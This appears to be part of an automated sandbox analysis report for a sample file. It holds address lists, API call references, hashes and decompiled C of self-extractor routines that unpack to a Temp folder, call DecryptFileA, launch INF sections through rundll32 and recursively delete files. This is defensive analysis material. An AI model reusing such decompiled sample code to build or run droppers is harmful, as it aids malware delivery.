                                                                                                                                                                                                                                              0x001a1d64
                                                                                                                                                                                                                                              0x001a1d67
                                                                                                                                                                                                                                              0x001a1d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1c67
                                                                                                                                                                                                                                              0x001a1c67
                                                                                                                                                                                                                                              0x001a1c6d
                                                                                                                                                                                                                                              0x001a1c72
                                                                                                                                                                                                                                              0x001a1c74
                                                                                                                                                                                                                                              0x001a1c74
                                                                                                                                                                                                                                              0x001a1c8e
                                                                                                                                                                                                                                              0x001a1c99
                                                                                                                                                                                                                                              0x001a1cc0
                                                                                                                                                                                                                                              0x001a1cf8
                                                                                                                                                                                                                                              0x001a1d07
                                                                                                                                                                                                                                              0x001a1d23
                                                                                                                                                                                                                                              0x001a1d09
                                                                                                                                                                                                                                              0x001a1d14
                                                                                                                                                                                                                                              0x001a1d1b
                                                                                                                                                                                                                                              0x001a1d1b
                                                                                                                                                                                                                                              0x001a1d2b
                                                                                                                                                                                                                                              0x001a1d2d
                                                                                                                                                                                                                                              0x001a1d2d
                                                                                                                                                                                                                                              0x001a1d38
                                                                                                                                                                                                                                              0x001a1d39
                                                                                                                                                                                                                                              0x001a1d46
                                                                                                                                                                                                                                              0x001a1cc2
                                                                                                                                                                                                                                              0x001a1cc2
                                                                                                                                                                                                                                              0x001a1ccc
                                                                                                                                                                                                                                              0x001a1cce
                                                                                                                                                                                                                                              0x001a1cce
                                                                                                                                                                                                                                              0x001a1cdb
                                                                                                                                                                                                                                              0x001a1ce6
                                                                                                                                                                                                                                              0x001a1cee
                                                                                                                                                                                                                                              0x001a1cee
                                                                                                                                                                                                                                              0x001a1e89
                                                                                                                                                                                                                                              0x001a1e91
                                                                                                                                                                                                                                              0x001a1e92
                                                                                                                                                                                                                                              0x001a1e94
                                                                                                                                                                                                                                              0x001a1e97
                                                                                                                                                                                                                                              0x001a1ea4
                                                                                                                                                                                                                                              0x001a1ea4
                                                                                                                                                                                                                                              0x001a1c61
                                                                                                                                                                                                                                              0x001a1c07
                                                                                                                                                                                                                                              0x001a1bd3
                                                                                                                                                                                                                                              0x001a1b7b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1BE7
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1BFE
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1C57
                                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 001A1C88
                                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,001A1140,00000000,00000008,?), ref: 001A1CB8
                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 001A1D1B
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                              • API String ID: 383838535-819679500
                                                                                                                                                                                                                                              • Opcode ID: bffaa85e425f9b760fdac4b6824b20b973b255010ab221045e9b5a9a429ad3a5
                                                                                                                                                                                                                                              • Instruction ID: d60c6aae992e0ea8bcec037994cdd7280bb5684b708fa89840b40195f6ec7e10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bffaa85e425f9b760fdac4b6824b20b973b255010ab221045e9b5a9a429ad3a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DA108BCA002187BEB219B34CC45BEA7769AF57310F144295F995E32D1DBB09EC6CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 450 1a2f1d-1a2f3d 451 1a2f3f-1a2f46 450->451 452 1a2f6c-1a2f73 call 1a5164 450->452 453 1a2f48 call 1a51e5 451->453 454 1a2f5f-1a2f66 call 1a3a3f 451->454 459 1a2f79-1a2f80 call 1a55a0 452->459 460 1a3041 452->460 461 1a2f4d-1a2f4f 453->461 454->452 454->460 459->460 468 1a2f86-1a2fbe GetSystemDirectoryA call 1a658a LoadLibraryA 459->468 464 1a3043-1a3053 call 1a6ce0 460->464 461->460 465 1a2f55-1a2f5d 461->465 465->452 465->454 472 1a2fc0-1a2fd4 GetProcAddress 468->472 473 1a2ff7-1a3004 FreeLibrary 468->473 472->473 474 1a2fd6-1a2fee DecryptFileA 472->474 475 1a3006-1a300c 473->475 476 1a3017-1a3024 SetCurrentDirectoryA 473->476 474->473 489 1a2ff0-1a2ff5 474->489 475->476 479 1a300e call 1a621e 475->479 477 1a3026-1a303c call 1a44b9 call 1a6285 476->477 478 1a3054-1a305a 476->478 477->460 482 1a305c call 1a3b26 478->482 483 1a3065-1a306c 478->483 487 1a3013-1a3015 479->487 495 1a3061-1a3063 482->495 485 1a306e-1a3075 call 1a256d 483->485 486 1a307c-1a3089 483->486 496 1a307a 485->496 492 1a308b-1a3091 486->492 493 1a30a1-1a30a9 486->493 487->460 487->476 489->473 492->493 497 1a3093 call 1a3ba2 492->497 499 1a30ab-1a30ad 493->499 500 1a30b4-1a30b7 493->500 495->460 495->483 496->486 503 1a3098-1a309a 497->503 499->500 502 1a30af call 1a4169 499->502 500->464 502->500 503->460 505 1a309c 503->505 505->493
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v272;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t47;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                                                                              				_t9 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                              				if( *0x1a8a38 != 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					_t11 = E001A5164(_t52);
                                                                                                                                                                                                                                              					_t53 = _t11;
                                                                                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						return E001A6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t14 = E001A55A0(_t53); // executed
                                                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t45 = 0x105;
                                                                                                                                                                                                                                              						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                              						_t43 = 0x105;
                                                                                                                                                                                                                                              						_t40 =  &_v272;
                                                                                                                                                                                                                                              						E001A658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                              						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                              						_t44 = 0;
                                                                                                                                                                                                                                              						if(_t36 != 0) {
                                                                                                                                                                                                                                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                              							_v276 = _t31;
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								_t45 = _t47;
                                                                                                                                                                                                                                              								_t40 = _t31;
                                                                                                                                                                                                                                              								 *0x1aa288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                              								_v276();
                                                                                                                                                                                                                                              								if(_t47 != _t47) {
                                                                                                                                                                                                                                              									_t40 = 4;
                                                                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						FreeLibrary(_t36);
                                                                                                                                                                                                                                              						_t58 =  *0x1a8a24 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                                                              							if(_t21 != 0) {
                                                                                                                                                                                                                                              								__eflags =  *0x1a8a2c - _t44; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									__eflags =  *0x1a8d48 & 0x000000c0;
                                                                                                                                                                                                                                              									if(( *0x1a8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              										_t41 =  *0x1a9a40; // 0x3, executed
                                                                                                                                                                                                                                              										_t26 = E001A256D(_t41); // executed
                                                                                                                                                                                                                                              										_t44 = _t26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t22 =  *0x1a8a24; // 0x0
                                                                                                                                                                                                                                              									 *0x1a9a44 = _t44;
                                                                                                                                                                                                                                              									__eflags = _t22;
                                                                                                                                                                                                                                              									if(_t22 != 0) {
                                                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                                                              										__eflags =  *0x1a8a38;
                                                                                                                                                                                                                                              										if( *0x1a8a38 == 0) {
                                                                                                                                                                                                                                              											__eflags = _t22;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												E001A4169(__eflags);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t12 = 1;
                                                                                                                                                                                                                                              										goto L17;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags =  *0x1a9a30 - _t22; // 0x0
                                                                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t25 = E001A3BA2(); // executed
                                                                                                                                                                                                                                              										__eflags = _t25;
                                                                                                                                                                                                                                              										if(_t25 == 0) {
                                                                                                                                                                                                                                              											goto L16;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t22 =  *0x1a8a24; // 0x0
                                                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t27 = E001A3B26(_t40, _t44);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t43 = 0x4bc;
                                                                                                                                                                                                                                              							E001A44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                              							 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t59 =  *0x1a9a30 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E001A621E(); // executed
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t49 =  *0x1a8a24;
                                                                                                                                                                                                                                              				if( *0x1a8a24 != 0) {
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					_t34 = E001A3A3F(_t51);
                                                                                                                                                                                                                                              					_t52 = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E001A51E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0x1a8a38;
                                                                                                                                                                                                                                              				if( *0x1a8a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x001a2f1d
                                                                                                                                                                                                                                              0x001a2f28
                                                                                                                                                                                                                                              0x001a2f2f
                                                                                                                                                                                                                                              0x001a2f3d
                                                                                                                                                                                                                                              0x001a2f6c
                                                                                                                                                                                                                                              0x001a2f6c
                                                                                                                                                                                                                                              0x001a2f71
                                                                                                                                                                                                                                              0x001a2f73
                                                                                                                                                                                                                                              0x001a3041
                                                                                                                                                                                                                                              0x001a3041
                                                                                                                                                                                                                                              0x001a3043
                                                                                                                                                                                                                                              0x001a3053
                                                                                                                                                                                                                                              0x001a3053
                                                                                                                                                                                                                                              0x001a2f79
                                                                                                                                                                                                                                              0x001a2f80
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2f86
                                                                                                                                                                                                                                              0x001a2f86
                                                                                                                                                                                                                                              0x001a2f93
                                                                                                                                                                                                                                              0x001a2f9e
                                                                                                                                                                                                                                              0x001a2fa0
                                                                                                                                                                                                                                              0x001a2fa6
                                                                                                                                                                                                                                              0x001a2fb8
                                                                                                                                                                                                                                              0x001a2fba
                                                                                                                                                                                                                                              0x001a2fbe
                                                                                                                                                                                                                                              0x001a2fc6
                                                                                                                                                                                                                                              0x001a2fcc
                                                                                                                                                                                                                                              0x001a2fd4
                                                                                                                                                                                                                                              0x001a2fd6
                                                                                                                                                                                                                                              0x001a2fd8
                                                                                                                                                                                                                                              0x001a2fe0
                                                                                                                                                                                                                                              0x001a2fe6
                                                                                                                                                                                                                                              0x001a2fee
                                                                                                                                                                                                                                              0x001a2ff0
                                                                                                                                                                                                                                              0x001a2ff5
                                                                                                                                                                                                                                              0x001a2ff5
                                                                                                                                                                                                                                              0x001a2fee
                                                                                                                                                                                                                                              0x001a2fd4
                                                                                                                                                                                                                                              0x001a2ff8
                                                                                                                                                                                                                                              0x001a2ffe
                                                                                                                                                                                                                                              0x001a3004
                                                                                                                                                                                                                                              0x001a3017
                                                                                                                                                                                                                                              0x001a301c
                                                                                                                                                                                                                                              0x001a3024
                                                                                                                                                                                                                                              0x001a3054
                                                                                                                                                                                                                                              0x001a305a
                                                                                                                                                                                                                                              0x001a3065
                                                                                                                                                                                                                                              0x001a3065
                                                                                                                                                                                                                                              0x001a306c
                                                                                                                                                                                                                                              0x001a306e
                                                                                                                                                                                                                                              0x001a3075
                                                                                                                                                                                                                                              0x001a307a
                                                                                                                                                                                                                                              0x001a307a
                                                                                                                                                                                                                                              0x001a307c
                                                                                                                                                                                                                                              0x001a3081
                                                                                                                                                                                                                                              0x001a3087
                                                                                                                                                                                                                                              0x001a3089
                                                                                                                                                                                                                                              0x001a30a1
                                                                                                                                                                                                                                              0x001a30a1
                                                                                                                                                                                                                                              0x001a30a9
                                                                                                                                                                                                                                              0x001a30ab
                                                                                                                                                                                                                                              0x001a30ad
                                                                                                                                                                                                                                              0x001a30af
                                                                                                                                                                                                                                              0x001a30af
                                                                                                                                                                                                                                              0x001a30ad
                                                                                                                                                                                                                                              0x001a30b6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a308b
                                                                                                                                                                                                                                              0x001a308b
                                                                                                                                                                                                                                              0x001a3091
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3093
                                                                                                                                                                                                                                              0x001a3098
                                                                                                                                                                                                                                              0x001a309a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a309c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a309c
                                                                                                                                                                                                                                              0x001a3089
                                                                                                                                                                                                                                              0x001a305c
                                                                                                                                                                                                                                              0x001a3061
                                                                                                                                                                                                                                              0x001a3063
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3063
                                                                                                                                                                                                                                              0x001a302b
                                                                                                                                                                                                                                              0x001a3032
                                                                                                                                                                                                                                              0x001a303c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a303c
                                                                                                                                                                                                                                              0x001a3006
                                                                                                                                                                                                                                              0x001a300c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a300e
                                                                                                                                                                                                                                              0x001a3015
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3015
                                                                                                                                                                                                                                              0x001a2f80
                                                                                                                                                                                                                                              0x001a2f3f
                                                                                                                                                                                                                                              0x001a2f46
                                                                                                                                                                                                                                              0x001a2f5f
                                                                                                                                                                                                                                              0x001a2f5f
                                                                                                                                                                                                                                              0x001a2f64
                                                                                                                                                                                                                                              0x001a2f66
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2f66
                                                                                                                                                                                                                                              0x001a2f4f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2f55
                                                                                                                                                                                                                                              0x001a2f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A2F93
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 001A2FB2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 001A2FC6
                                                                                                                                                                                                                                              • DecryptFileA.ADVAPI32 ref: 001A2FE6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001A2FF8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A301C
                                                                                                                                                                                                                                                • Part of subcall function 001A51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F4D,?,00000002,00000000), ref: 001A5201
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 2126469477-3023407756
                                                                                                                                                                                                                                              • Opcode ID: cb39f72d78d19587f516e1119313531ebf6097b0f825c9861624a9175a6c1b62
                                                                                                                                                                                                                                              • Instruction ID: 7a6eae43469c0712b0147ed163c9cec49836b762845f0330938a1e7eba35e1dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb39f72d78d19587f516e1119313531ebf6097b0f825c9861624a9175a6c1b62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD41D53DA002159FDB30AB75AE45B6A37A9EF67750F000166F951C3992EF74CEC0CA61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A2390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E001A6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E001A16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E001A1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E001A16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E001A16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E001A658A( &_v280, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              								E001A2390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              0x001a2398
                                                                                                                                                                                                                                              0x001a239e
                                                                                                                                                                                                                                              0x001a23a3
                                                                                                                                                                                                                                              0x001a23a5
                                                                                                                                                                                                                                              0x001a23ae
                                                                                                                                                                                                                                              0x001a23b3
                                                                                                                                                                                                                                              0x001a24cb
                                                                                                                                                                                                                                              0x001a24d2
                                                                                                                                                                                                                                              0x001a24d3
                                                                                                                                                                                                                                              0x001a24d4
                                                                                                                                                                                                                                              0x001a24df
                                                                                                                                                                                                                                              0x001a23c2
                                                                                                                                                                                                                                              0x001a23d1
                                                                                                                                                                                                                                              0x001a23db
                                                                                                                                                                                                                                              0x001a23e4
                                                                                                                                                                                                                                              0x001a23f6
                                                                                                                                                                                                                                              0x001a23fc
                                                                                                                                                                                                                                              0x001a2401
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2407
                                                                                                                                                                                                                                              0x001a2407
                                                                                                                                                                                                                                              0x001a2408
                                                                                                                                                                                                                                              0x001a2411
                                                                                                                                                                                                                                              0x001a241f
                                                                                                                                                                                                                                              0x001a247a
                                                                                                                                                                                                                                              0x001a2483
                                                                                                                                                                                                                                              0x001a2495
                                                                                                                                                                                                                                              0x001a24a3
                                                                                                                                                                                                                                              0x001a2421
                                                                                                                                                                                                                                              0x001a242f
                                                                                                                                                                                                                                              0x001a2453
                                                                                                                                                                                                                                              0x001a245d
                                                                                                                                                                                                                                              0x001a2466
                                                                                                                                                                                                                                              0x001a2472
                                                                                                                                                                                                                                              0x001a2472
                                                                                                                                                                                                                                              0x001a242f
                                                                                                                                                                                                                                              0x001a24af
                                                                                                                                                                                                                                              0x001a24b5
                                                                                                                                                                                                                                              0x001a24be
                                                                                                                                                                                                                                              0x001a24c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a24c5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,001A8A3A,001A11F4,001A8A3A,00000000,?,?), ref: 001A23F6
